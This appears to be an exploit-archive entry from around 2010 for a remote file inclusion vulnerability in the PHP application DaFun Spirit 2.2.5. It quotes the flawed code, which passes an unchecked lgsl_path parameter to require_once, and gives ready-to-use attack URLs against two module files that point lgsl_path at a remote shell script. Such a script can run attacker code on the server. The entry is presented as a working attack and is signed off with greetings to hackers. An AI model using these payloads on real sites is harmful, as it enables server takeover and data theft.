DaFun Spirit 2.2.5 Multiple Remote File Include Vulnerability

2010-03-26T00:00:00
ID 1337DAY-ID-11457
Type zdt
Reporter Mat
Modified 2010-03-26T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =============================================================
DaFun Spirit 2.2.5 Multiple Remote File Include Vulnerability
=============================================================


        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
DaFun Spirit 2.2.5 Multiple Remote File Include Vulnerability
Script: http://code.google.com/p/dafunspirit/downloads/list
Author: mat
Mail: [email protected]
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)
 
Vuln Code
 
//-----------------------------------------------------------------------------------------------------------+
 
  $lgsl_path = ""; // RELATIVE PATH BETWEEN THIS FILE AND THE LGSL FOLDER FOR PAGE INTEGRATION
 
//-----------------------------------------------------------------------------------------------------------+
 
  require_once($lgsl_path."lgsl_protocol.php");
 
  $get_ip   = $_GET[ip];
  $get_port = $_GET[port];
 
//-----------------------------------------------------------------------------------------------------------+
 
Usage: http://[target]/[path]/modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://[shellscript]
       http://[target]/[path]/modules/dfss/lgsl/lgsl_settings.php?lgsl_path=http://[shellscript]
 
 
Greetings: All Hackerz



#  0day.today [2018-01-02]  #